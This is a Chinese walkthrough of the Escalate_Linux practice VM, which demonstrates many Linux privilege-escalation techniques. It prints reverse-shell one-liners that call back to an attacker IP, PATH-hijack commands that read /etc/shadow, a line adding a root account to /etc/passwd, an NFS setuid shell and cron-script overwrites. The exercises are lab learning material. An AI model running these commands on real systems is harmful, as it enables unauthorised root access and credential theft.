Escalate_Linux靶机

Escalate_Linux靶机

前言:集合了多种liunx提权方法的靶场,通过该靶场可以简单的了解liunx提权方法

1,扫描一下端口

80/tcp open http

111/tcp open rpc 2049/udp nfs要知道对方的共享才能挂载

139/445 Samba

SMB是一个协议名,全称是Server Message Block(服务器消息快协议),用于在计算机间共享文件、打印机、串口等,电脑上的网上邻居由它实现。一般共享文件夹和打印机使用较多 它是应用层(和表示层)协议,使用C/S架构

当远程连接计算机访问共享资源时有两种方式: 
1.        \\共享计算机地址\共IP享资源路径
2.        \\共享计算机名\共享资源路径

smb的默认端口可能是139或者445,其工作的端口与其使用的协议有关。

Enum4linux是用于枚举windows和Linux系统上的SMB服务的工具。

smbclient 是一个在Unix/Linux系统中的一个应用程序,它允许用户以类似于 ftp 的方式访问Windows系统上的 共享资源。它是Samba 软件 套件的一部分,可以让Linux系统与 Windows系统 进行网络共享。

-L

列出服务器上的共享资源

-N

不需要密码

-U

指定用户名

-W

指定工作组

-d

指定调试级别

smbclient ///要访问的文件名 -I ip -N

这条路走不通换一条

像这种初始页面是没有什么东西的,进行目录爆破

这爆出来的没什么用,像这种情况换字典或者模糊测试

apache 不会解析asp/aspx(iis)这种是iis的站

http请求→中间件→框架→数据库

在页面或者一些tcp请求:

中间件→: 暴露在外网的

数据库:内网(服务器)

站库分离

apache+php+mysql

apache,tomcat , nginx , IIs7.0以上

wfuzz最方便

dirb

-X .php .html .asp 指定文件后缀爆破

菜刀(不到1mb)→蚁剑→冰蝎,哥斯拉

冰蝎可以做一些加密和混淆shell,常见的waf检测不出来,是免杀和绕过最好的

哥斯拉利于管理,也有一些免杀

使用which 测试对方有没有python

进行反弹shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.128",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

python -c 'import pty; pty.spawn("/bin/bash")'

稳定shell

在本机下载LinEnum

GitHub - rebootuser/LinEnum: Scripted Local Linux Enumeration & Privilege Escalation Checks

然后在kali上开启http服务,然后让目标下载下来

给权限

之后在tmp目录下启动,因为tmp目录权限大

还有一个linpeas.sh和上面的一样操作方法下载下来

然后给权限,进行执行./linpeas.sh和./linpeas.sh

history(历史命令)

存放了历史命令,如果出现了whoami uname -a 大概率就是被人打进来了

内网信息收集:

linpeas:不存在内核漏洞,因为它都没变红

1,每5分钟去执行一次这个脚本

与本地建立的链接也看的到

2,3306端口

3,用户信息

uid,gid和groups是可以提权的

信息泄露

5,nfs挂载权限问题,前面有no没有开启安全功能,可以在共享的功能底下去互相传输

6,这个文件有root权限

7,root文件信息(疑似可提权目录)

/var/mysql(已发现)

script(ls)

abc.txt(空文件)

shell(.sh执行bash -i)

.script.sh(已利用)

.bash_history ,历史记录中有进攻的提示!

/etc/crontab

收集好信息准备提权

1,user3

有一个shell文件,用ida查看

int __cdecl main(int argc, const char **argv, const char **envp)
{setuid(0);setgid(0);system("./.script.sh");return 0;
}

调用的是.script.sh

应该在当前目录下,如果不在用find / -name .script.sh 2>dev/null

查找

调用了bash -i

1,suid提权

运行就获取到了root权限

2,user5

它下面有应该script文件

源码

int __cdecl main(int argc, const char **argv, const char **envp)
{setuid(0);setgid(0);system("ls");return 0;
}

可以使用PATH赋权执行命令

export PATH=/tmp:$PATH,当前只需要执行ls命令,就会调用tmp目录下的文件去执行!

ls一般是在/etc/ls这里

现在设置成了全局变量

本身ls是在/etc/ls这里的

在tmp目录创建ls文件。

全局变量调用/tmp/ls

执行script就会执行ls,就会执行tmp的ls

就拿到root权限了!

3,暴力破解

目录枚举爆破

/etc/shadow ——存放密匙信息

没有权限去看的

借鉴方法2,进行查看

echo 'cat /etc/shadow' > ls
chmod 777 ls
export PATH=/tmp:$PATH
./script

使用hash-identifier进行读取

这个值是可以爆破的

爆破要的值要全选,包括前面的用户名

爆破的存放在john下面了

root:12345

4,user4 计划任务

每5分钟执行一次 /home/user4/Desktop/autoscript.sh

也bash -i

只有user4才能执行

两个方法,一暴力破解或者信息枚举,二可以用ls也可以用.sh

chpasswd —-

echo 'echo user4:12345 | chpasswd' > ls

user4的密码就被覆盖了

没有执行成功,因为里面的bash -i 是写进去的,覆盖掉就可以了

echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.128 6666 >/tmp/f' > autoscript.sh

进行nc反弹

成功

5,mysql

mysql -uroot -proot

看库

use user 进入库

然后看一下表

查看表信息

mysql mysql@12345

显示没有权限,uid和gid都是mysql,这种时候给它一个权限

信息泄露

6,user8

如果mysql没有user8的信息泄露,还可以用ls和.sh进行覆盖密码进入。

root权限进入vi,没有任何编辑就可以执行任何命令

(root)NOPASSWD:/usr/bin/vi

7,user7

user7是gid为0的root组的成员!

openssl passwd dayuxiyou

echo "dayu:BKStJ5AmLV5aA:0:0:root:/root:/bin/bash" >>/etc/passwd

8,和方法7一样,user4 group也有root

9,nfs user5

no_root_squash —-关闭了安全功能

/home/user5 *w,no_root_squash)

mount -t nfs 192.168.0.134:/home/user5 /tmp/dayu

df看系统有没有挂载

unmount /tmp/dayu 结束,要退出当前目录

目录是共享状态

缺少文件

写一个通用的shell

#include <stdlib.h>
int main() { setuid(0); setgid(0); system("/bin/sh"); }

将其写入shell.c文件

gcc编译一下之后执行就可以拿到root权限了

10,user2

(user1)ALL 可以sudo -u user1 /bin/bash

(root)ALL 括号有root就有root的全部权限

进入user1

然后sudo -l 然后sudo su

总结:一个集合了多种提权方法的靶场

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/bicheng/65055.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

PPO算法基础(一)

PPO近端策略优化算法 我们今天还是主要来理解PPO算法的数学原理。PPO是一种策略梯度方法&#xff0c;简单的策略梯度对每个样本&#xff08;或者一组样本&#xff09;进行一次梯度更新&#xff0c;对单个样本执行多个梯度步骤会导致一些问题&#xff0c;因为梯度偏差太大&…

[机器学习]sklearn入门指南(1)

简介 scikit-learn&#xff08;简称sklearn&#xff09;是一个开源的Python机器学习库&#xff0c;它提供了简单而高效的工具用于数据挖掘和数据分析&#xff0c;并且拥有一个活跃的开发社区。它建立在NumPy、SciPy和matplotlib这些科学计算库之上&#xff0c;旨在提供一致且可…

贪心算法(三)

目录 一、k次取反后最大化的数组和 二、优势洗牌 三、最长回文串 四、增减字符串匹配 一、k次取反后最大化的数组和 k次取反后最大化的数组和 贪心策略&#xff1a; 解题代码&#xff1a; class Solution { public:int largestSumAfterKNegations(vector<int>&am…

文本的AIGC率检测原理

背景 你可能在学生群里或者视频中看过这样的消息&#xff1a;“我们学校要求论文AI率不能超过30%&#xff01;”、“你们学校查AI率吗&#xff1f;”之类的&#xff0c;这些消息到底是真是假&#xff1f; 随着人工智能的快速发展和广泛应用&#xff0c;不论是工作中还是学生学…

Linux -- 从抢票逻辑理解线程互斥

目录 抢票逻辑代码&#xff1a; thread.hpp thread.cc 运行结果&#xff1a; 为什么票会抢为负数&#xff1f; 概念前言 临界资源 临界区 原子性 数据不一致 为什么数据不一致&#xff1f; 互斥 概念 pthread_mutex_init&#xff08;初始化互斥锁&#xff09; p…

浅谈目前我开发的前端项目用到的设计模式

浅谈目前我开发的前端项目用到的设计模式 前言 设计模式很多&#xff0c;看到一个需求&#xff0c;项目&#xff0c;我们去开发的时候&#xff0c;肯定是做一个整体的设计进行开发&#xff0c;而在这次我项目中&#xff0c;我也做了一个整体的设计&#xff0c;为什么要设计&a…

ubuntu笔记

1.系统下载与虚拟机设置 系统下载https://cn.ubuntu.comhttps://releases.ubuntu.com 虚拟机设置: 桥接模式 在桥接模式下, 虚拟出来的操作系统就像是局域网中的一台独立的主机, 它可以访问网内任何一台机器主机网卡和虚拟网卡的IP地址处于同一个网段, 子网掩码、网关、DNS等…

开放世界目标检测 Grounding DINO

开放世界目标检测 Grounding DINO flyfish Grounding DINO 是一种开创性的开放集对象检测器&#xff0c;它通过结合基于Transformer的检测器DINO与基于文本描述的预训练技术&#xff0c;实现了可以根据人类输入&#xff08;如类别名称或指代表达&#xff09;检测任意对象的功…

【基础篇】1. JasperSoft Studio编辑器与报表属性介绍

编辑器介绍 Jaspersoft Studio有一个多选项卡编辑器&#xff0c;其中包括三个标签&#xff1a;设计&#xff0c;源代码和预览。 Design&#xff1a;报表设计页面&#xff0c;可以图形化拖拉组件设计报表&#xff0c;打开报表文件的主页面Source&#xff1a;源代码页码&#xff…

电子应用设计方案71:智能客厅窗帘系统设计

智能客厅窗帘系统设计 一、引言 智能客厅窗帘系统为用户提供了更加便捷、舒适和个性化的窗帘控制方式&#xff0c;提升了家居的智能化水平和生活品质。 二、系统概述 1. 系统目标 - 实现客厅窗帘的自动开合控制&#xff0c;可通过多种方式操作。 - 能够根据时间、光照强度和用…

免杀对抗—Behinder魔改流量特征去除

前言 在现实的攻防中&#xff0c;往往webshell要比主机后门要用得多&#xff0c;因为我们首先要突破的目标是网站嘛&#xff0c;而且waf也往往会更注重webshell的检测。webshell的免杀分为两个&#xff0c;一是静态查杀&#xff0c;二是流量查杀。静态查杀不用多说了&#xff…

高阶:基于Python paddleocr库 提取pdf 文档高亮显示的内容

预览 第1步&#xff1a;理解基本结构和导入必要的库 # 1. 首先导入需要的库 import os # 用于处理文件和路径 import cv2 # 用于图像处理 import numpy as np # 用于数值计算 from paddleocr import PaddleOCR # 用于文字识别 from pdf2image import convert_from_path #…

如何查看pad的console输出,以便我们更好的进行调试,查看并了解实际可能的问题。

1、以下是baidu AI回复&#xff1a; 2、说明&#xff1a; 1&#xff09;如果小伙伴们经常做android开发的话&#xff0c;这个不陌生&#xff0c;因为调试都是要开启这个开发者模式。并启用USB调试模式。 2&#xff09;需要连上USB线&#xff0c;有的时候会忘记&#xff0c;然…

GitHub 桌面版配置 |可视化界面进行上传到远程仓库 | gitLab 配置【把密码存在本地服务器】

&#x1f947; 版权: 本文由【墨理学AI】原创首发、各位读者大大、敬请查阅、感谢三连 &#x1f389; 声明: 作为全网 AI 领域 干货最多的博主之一&#xff0c;❤️ 不负光阴不负卿 ❤️ 文章目录 桌面版安装包下载clone 仓库操作如下GitLab 配置不再重复输入账户和密码的两个方…

智慧社区电子商务系统:实现社区资源的数字化管理

2.1vue技术 Vue (读音 /vjuː/&#xff0c;类似于 view) 是一套用于构建用户界面的渐进式JavaScript框架。 [5] 与其它大型框架不同的是&#xff0c;Vue 被设计为可以自底向上逐层应用。Vue 的核心库只关注视图层&#xff0c;不仅易于上手&#xff0c;还便于与第三方库或既有项…

【软件项目管理】-期末突击

区别常见的项目和活动 项目和活动的区别&#xff1a; 定义&#xff1a; 项目&#xff1a;为创造独特成果而进行的临时性工作。活动&#xff1a;日常运营中的重复性工作。 目标&#xff1a; 项目&#xff1a;实现特定成果&#xff0c;一次性。活动&#xff1a;维持日常运作&am…

【C++】ceil 和 floor 函数的实现与分析

博客主页&#xff1a; [小ᶻ☡꙳ᵃⁱᵍᶜ꙳] 本文专栏: C 文章目录 &#x1f4af;前言&#x1f4af;ceil 和 floor 函数的基础介绍1. ceil 函数定义与功能示例代码输出结果功能分析使用场景 2. floor 函数定义与功能示例代码输出结果功能分析使用场景 &#x1f4af;自行实现…

合合信息:探索视觉内容安全新前沿

2024年12月13日-15日&#xff0c;中国图象图形学学会在杭州召开。大会期间&#xff0c;来自合合信息的图像算法研发总监郭丰俊进行了主题为“视觉内容安全技术的前沿进展与应用”的演讲&#xff0c;介绍了视觉内容安全问题&#xff0c;并总结了现今的技术发展&#xff0c;对我很…

【JetPack】Navigation知识点总结

Navigation的主要元素&#xff1a; 1、Navigation Graph&#xff1a; 一种新的XML资源文件,包含应用程序所有的页面&#xff0c;以及页面间的关系。 <?xml version"1.0" encoding"utf-8"?> <navigation xmlns:android"http://schemas.a…

教师如何打造专属私密成绩查询系统?

期末的校园&#xff0c;被一种特殊的氛围所笼罩。老师们如同辛勤的工匠&#xff0c;精心打磨着每一个教学环节。复习阶段&#xff0c;他们在知识的宝库中精挑细选&#xff0c;把一学期的重点内容一一梳理&#xff0c;为学生们打造出系统的复习框架。课堂上&#xff0c;他们激情…